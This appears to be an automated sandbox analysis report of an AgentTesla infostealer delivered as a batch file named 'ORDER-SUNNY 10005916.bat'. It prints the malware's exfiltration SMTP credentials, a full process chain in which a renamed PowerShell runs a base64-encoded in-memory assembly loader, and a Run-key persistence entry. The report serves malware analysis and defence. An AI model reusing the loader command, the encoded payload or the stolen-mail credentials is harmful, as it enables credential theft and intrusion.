Analysis
-
max time kernel
139s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20231130-en -
resource tags
arch:x64arch:x86image:win10v2004-20231130-enlocale:en-usos:windows10-2004-x64system -
submitted
08-12-2023 00:23
Static task
static1
Behavioral task
behavioral1
Sample
ORDER-SUNNY 10005916.bat
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
ORDER-SUNNY 10005916.bat
Resource
win10v2004-20231130-en
General
-
Target
ORDER-SUNNY 10005916.bat
-
Size
1009KB
-
MD5
27c302e3247d5a9f8fce50cfba636e22
-
SHA1
7939d397dba283814967080fb37913d9076dab49
-
SHA256
1dcd0d42ac6d49c7447bd11b3c08d26b3e03d1000483c8ce1ac6914fd249a6a0
-
SHA512
040e32f01348045b4a9d65666e7bb966150b3ae34e6078b23c0d3c58a8f18e48096091e05ea5bffa09a4f33f93a441e4767a9d9468e8d3f4adbcfc10733b4c70
-
SSDEEP
24576:hHOmVihj9V3HNS0B0dgIx4l0ivt/Ixdt+gnfpV6gXhtnLPv+yqV82DqdFUWvw:h6j3fpI57zPVqmTgj
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.asiaparadisehotel.com - Port:
587 - Username:
[email protected] - Password:
^b2ycDldex$@ - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Executes dropped EXE 1 IoCs
pid Process 224 Iduou.png -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1791582586-1997866593-3795608343-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\M yApp = "C:\\Users\\Admin\\AppData\\Roaming\\M yApp\\M yApp.exe" Iduou.png -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 32 api.ipify.org 31 api.ipify.org -
Program crash 1 IoCs
pid pid_target Process procid_target 3004 224 WerFault.exe 94 -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 224 Iduou.png 224 Iduou.png 224 Iduou.png 224 Iduou.png -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 224 Iduou.png Token: SeDebugPrivilege 224 Iduou.png Token: SeRestorePrivilege 224 Iduou.png Token: SeBackupPrivilege 224 Iduou.png -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 1704 wrote to memory of 1460 1704 cmd.exe 87 PID 1704 wrote to memory of 1460 1704 cmd.exe 87 PID 1704 wrote to memory of 2716 1704 cmd.exe 86 PID 1704 wrote to memory of 2716 1704 cmd.exe 86 PID 1704 wrote to memory of 3848 1704 cmd.exe 88 PID 1704 wrote to memory of 3848 1704 cmd.exe 88 PID 3848 wrote to memory of 4240 3848 cmd.exe 90 PID 3848 wrote to memory of 4240 3848 cmd.exe 90 PID 3848 wrote to memory of 4516 3848 cmd.exe 91 PID 3848 wrote to memory of 4516 3848 cmd.exe 91 PID 3848 wrote to memory of 4332 3848 cmd.exe 92 PID 3848 wrote to memory of 4332 3848 cmd.exe 92 PID 3848 wrote to memory of 1836 3848 cmd.exe 93 PID 3848 wrote to memory of 1836 3848 cmd.exe 93 PID 3848 wrote to memory of 224 3848 cmd.exe 94 PID 3848 wrote to memory of 224 3848 cmd.exe 94 PID 3848 wrote to memory of 224 3848 cmd.exe 94
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ORDER-SUNNY 10005916.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Iduou.png2⤵PID:2716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "2⤵PID:1460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ORDER-SUNNY 10005916.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:4240
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Iduou.png3⤵PID:4516
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:4332
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\ORDER-SUNNY 10005916.bat" C:\Users\Admin\AppData\Local\Temp\Iduou.png.bat3⤵PID:1836
-
-
C:\Users\Admin\AppData\Local\Temp\Iduou.pngC:\Users\Admin\AppData\Local\Temp\Iduou.png -win 1 -enc JABBAGIAcQB5AGwAYwBiAGYAcgBvACAAPQAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEwAaQBuAGUAcwAoACgAKABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQApAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAiAC4AYgBhAHQAIgApACwAIABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAApACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAGwAYQBzAHQAIAAxADsAIAAkAEcAYwBxAHMAcwBuAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQQBiAHEAeQBsAGMAYgBmAHIAbwApADsAJABKAHQAdABjAHAAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEcAYwBxAHMAcwBuAGQAIAApADsAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAVQB2AGoAZABtAGcAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABKAHQAdABjAHAALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAFUAdgBqAGQAbQBnAGwALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAFUAdgBqAGQAbQBnAGwALgBDAGwAbwBzAGUAKAApADsAJABKAHQAdABjAHAALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABHAGMAcQBzAHMAbgBkACAAPQAgACQAbwB1AHQAcAB1AHQALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEcAYwBxAHMAcwBuAGQAKQA7ACAAJABWAG0AaABoAHEAZABwACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAEcAYwBxAHMAcwBuAGQAKQA7ACAAJABQAHEAawBpAHkAbABpAGMAcgAgAD0AIAAkAFYAbQBoAGgAcQBkAHAALgBHAGUAdABFAHgAcABvAHIAdABlAGQAVAB5AHAAZQBzACgAKQBbADAAXQA7ACAAJABQAHUAZABxAHcAbgBzAGUAdAB4AG8AIAA9ACAAJABQAHEAawBpAHkAbABpAGMAcgAuAEcAZQB0AE0AZQB0AGgAbwBkAHMAKAApAFsAMABdAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:224 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 30444⤵
- Program crash
PID:3004
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 224 -ip 2241⤵PID:4992
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
1009KB
MD527c302e3247d5a9f8fce50cfba636e22
SHA17939d397dba283814967080fb37913d9076dab49
SHA2561dcd0d42ac6d49c7447bd11b3c08d26b3e03d1000483c8ce1ac6914fd249a6a0
SHA512040e32f01348045b4a9d65666e7bb966150b3ae34e6078b23c0d3c58a8f18e48096091e05ea5bffa09a4f33f93a441e4767a9d9468e8d3f4adbcfc10733b4c70
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc